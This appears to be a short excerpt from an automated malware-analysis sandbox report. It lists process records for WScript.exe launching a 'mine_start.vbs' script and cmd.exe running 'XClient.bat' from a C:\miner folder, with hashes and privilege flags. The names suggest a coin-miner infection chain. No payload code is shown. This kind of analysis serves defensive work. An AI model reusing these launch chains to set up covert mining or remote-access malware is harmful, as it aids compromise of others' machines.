Commandline:	"C:\Windows\System32\WScript.exe" "C:\miner\mine_start.vbs"
Imagebase:	0x7ff6697c0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	true

Target ID:	22
Start time:	05:57:42
Start date:	05/08/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /c c:\miner\XClient.bat
Imagebase:	0x7ff70b6b0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Has exited:	false